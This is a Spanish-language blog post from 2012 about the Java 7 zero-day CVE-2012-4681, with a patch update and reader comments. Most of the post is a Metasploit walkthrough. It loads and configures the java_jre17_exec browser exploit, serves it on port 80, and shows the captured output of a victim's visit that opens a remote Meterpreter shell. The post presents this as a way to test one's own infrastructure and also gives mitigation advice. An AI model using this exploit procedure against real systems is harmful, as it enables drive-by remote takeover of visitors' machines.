Ayer se dio a conocer por todo Internet un 0 day de Java, con el código fuente del mismo que permite acceso remoto a un equipo con la simple visita de una página web para ello preparada (o la ejecución del código). Aunque el código ya está publicado por la red, la gente de metasploit también ha sacado un pequeño módulo que aprovecha dicha vulnerabilidad para permitir a un atacante acceder a una máquina vulnerable. Si quieres comprobar si tu infraestructura se ve afectada, simplemente actualiza tus módulos y ¡compruébalo!
msf> use exploit/multi/browser/java_jre17_exec msf exploit(java_jre17_exec)> show options Module options (exploit/multi/browser/java_jre17_exec): Name Setting Description ---- ------- ----------- SRVHOST 0.0.0.0 The local host to listen on. SRVPORT 8080 The local port to listen on. SSL false Negotiate SSL for incoming connections SSLCert Path to a custom SSL certificate SSLVersion SSL3 Specify the version of SSL that should be used URIPATH The URI to use for this exploit Exploit target: Id Name -- ---- 0 Generic (Java Payload) msf exploit(java_jre17_exec)> set URIPATH / URIPATH => / msf exploit(java_jre17_exec)> set SRVPORT 80 SRVPORT => 80
Tras tener todo cargado y configurado, únicamente queda por ejecutar el exploit.
msf exploit(java_jre17_exec)> exploit [*] Exploit running as background job. [*] Started reverse handler on 192.168.1.33:4444 [*] Using URL: http://0.0.0.0:80/ [*] Local IP: http://192.168.1.33:80/ [*] Server started.
Una vez lanzado, sólo queda esperar a que una víctima acceda a la página vulnerable y que tenga el plugin de java activado. En este caso da igual el navegador o el sistema operativo, ya que todos se ven afectados.
msf exploit(java_jre17_exec)> [*] 192.168.1.33 java_jre17_exec - Java 7 Applet Remote Code Execution handling request [*] 192.168.1.33 java_jre17_exec - Sending Applet.jar [*] Sending stage (30216 bytes) to 192.168.1.33 [*] Meterpreter session 1 opened (192.168.1.33:4444 -> 192.168.1.50:1259) at 2012-08-28 19:59:45 +0200 msf exploit(java_jre17_exec)> sessions Active sessions =============== Id Type Connection -- ---- ---------- 1 meterpreter java/java 192.168.1.33:4444 -> 192.168.1.50:1259 msf exploit(java_jre17_exec)> sessions -i 1 [*] Starting interaction with 1... meterpreter>
Por el momento no hay ningún parche de seguridad, así que lo mejor es deshabilitar el complemento Java de todos los navegadores.
Más información, aquí y aquí.
[Actualización 31-Agosto-2012]
Oracle por fin ha publicado la esperada actualización al fallo de seguridad CVE-2012-4681. Actualiza: Java™ SE Development Kit 7, Update 7 (JDK 7u7).
Probando el acceso a un equipo con avast! detecta el código malicioso y bloquea la página.
ResponderEliminarUn método de prevención antes del parche, si Java en necesario.
URL de descarga del parche para evitar estar vulnerabilidad: http://www.oracle.com/technetwork/java/javase/7u7-relnotes-1835816.html
ResponderEliminar